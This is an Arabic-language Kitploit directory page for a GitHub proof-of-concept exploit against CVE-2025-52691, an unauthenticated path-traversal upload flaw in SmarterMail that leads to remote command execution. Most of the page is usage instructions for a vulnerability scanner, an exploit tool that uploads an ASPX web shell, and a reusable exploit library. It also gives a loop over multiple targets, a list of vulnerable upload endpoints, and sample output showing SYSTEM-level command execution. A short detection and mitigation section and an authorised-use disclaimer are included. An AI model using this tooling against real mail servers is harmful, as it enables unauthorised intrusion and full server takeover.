Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-52691-poc | Kitploit
أدوات/GitHubGitHub/rimbadirgantara/cve-2025-52691-poc
ماسحات الثغرات الأمنيةتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubrimbadirgantara/cve-2025-52691-poc

CVE-2025-52691-poc

عرض المستودع
3منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-52691 إثبات المفهوم

إثبات المفهوم لـ CVE-2025-52691 - رفع ملفات عشوائي بدون مصادقة في SmarterMail يؤدي إلى تنفيذ الأوامر عن بُعد (RCE)

⚠️ إخلاء مسؤولية

للاستخدام المصرّح به في الاختبارات الأمنية والأغراض التعليمية فقط. الوصول غير المصرّح به غير قانوني.

نظرة عامة

ثغرة حرجة في SmarterMail تسمح برفع ملفات عشوائية بدون مصادقة عبر تجاوز المسار (path traversal)، مما يؤدي إلى تنفيذ الأوامر عن بُعد.

الثغرة: تجاوز المسار في نقاط نهاية الرفع يسمح برفع قوائم ويب ASPX إلى جذر الويب
الأثر: تنفيذ الأوامر عن بُعد بدون مصادقة
ناقل الهجوم: شبكة / بدون مصادقة

التثبيت

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-52691-POC.git
cd CVE-2025-52691-POC
pip install requests urllib3

الأدوات

check.py - ماسح الثغرات

يفحص الأهداف بحثًا عن ثغرة CVE-2025-52691. يحفظ عناوين URL المعرّضة للخطر فقط في ملف الإخراج.

root@kitploit:~
# Single target
python check.py https://mail.example.com

# Multiple targets
python check.py -f targets.txt -o results.txt

# Custom timeout
python check.py https://mail.example.com -t 30

الإخراج: عنوان URL واحد معرّض للخطر في كل سطر داخل results.txt

pwn.py - أداة الاستغلال

يقوم برفع قشرة ويب ASPX ويتيح تنفيذ الأوامر.

root@kitploit:~
# Basic exploit
python pwn.py https://mail.example.com

# Execute command
python pwn.py https://mail.example.com -c "whoami"

# Interactive shell
python pwn.py https://mail.example.com -i

exploit.py - مكتبة بايثون

وحدة استغلال قابلة لإعادة الاستخدام للتكامل مع السكربتات المخصصة.

كمكتبة:

root@kitploit:~
from exploit import SmarterMailExploit, TargetConfig, ExploitResult

# Basic usage
config = TargetConfig(base_url="https://mail.example.com")
exploit = SmarterMailExploit(config)

if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
    print(exploit.execute_command("whoami"))

# With custom timeout
config = TargetConfig(base_url="https://mail.example.com", timeout=60)
exploit = SmarterMailExploit(config)
result = exploit.exploit()

# Execute multiple commands
if result == ExploitResult.SHELL_UPLOADED:
    print(exploit.execute_command("whoami"))
    print(exploit.execute_command("hostname"))
    print(exploit.execute_command("ipconfig"))

كسكربت مستقل:

root@kitploit:~
# Import and run in Python
python -c "from exploit import *; e=SmarterMailExploit(TargetConfig('https://mail.example.com')); e.exploit()"

# Create custom script
cat << 'EOF' > my_exploit.py
from exploit import SmarterMailExploit, TargetConfig, ExploitResult

targets = ['https://mail1.example.com', 'https://mail2.example.com']
for target in targets:
    config = TargetConfig(base_url=target)
    exploit = SmarterMailExploit(config)
    if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
        print(f"[+] Exploited: {target}")
        print(exploit.execute_command("whoami"))
EOF
python my_exploit.py

التفاصيل التقنية

نقاط النهاية المعرّضة للخطر:

root@kitploit:~
/api/upload
/api/v1/upload
/Interface/Frmx/UploadFile.aspx
/MRS/Upload.ashx
/Services/Upload.ashx

طرق الاستغلال:

  • رفع نموذج متعدد الأجزاء مع تجاوز المسار (../wwwroot/)
  • طلب POST خام مع ترويسات مخصصة
  • حمولة JSON بمحتوى مشفّر بـ base64

قشرة الويب: قشرة ASPX بسيطة تستقبل الأوامر عبر معامل ?cmd=

تسلسل الهجوم

  1. امسح الهدف: python check.py <target>
  2. استغل: python pwn.py <target> -i
  3. نفّذ الأوامر في القشرة التفاعلية

الاكتشاف والتخفيف

الاكتشاف:

  • مراقبة عمليات رفع ملفات ASPX إلى أدلة الويب
  • فحص السجلات بحثًا عن أنماط تجاوز المسار (../)
  • التنبيه عند وجود طلبات غير متوقعة إلى /api/upload

التخفيف:

  • تحديث SmarterMail إلى أحدث إصدار
  • تطبيق تحقق صارم من مسارات الملفات
  • نشر جدار حماية لتطبيقات الويب (WAF) مع تصفية للرفع
  • طلب مصادقة على نقاط نهاية الرفع

مثال

root@kitploit:~
$ python pwn.py https://mail.example.com -c "whoami"

[*] Target: https://mail.example.com
[+] Target is alive
[*] Shell filename: s4a7b3c2.aspx
[*] Attempting to upload webshell...
[+] SUCCESS! Webshell uploaded
[+] Shell URL: https://mail.example.com/s4a7b3c2.aspx

[*] Executing: whoami
[+] Output:
nt authority\system

احصل دائمًا على التصريح المناسب قبل إجراء الاختبارات.

تنزيل الأداة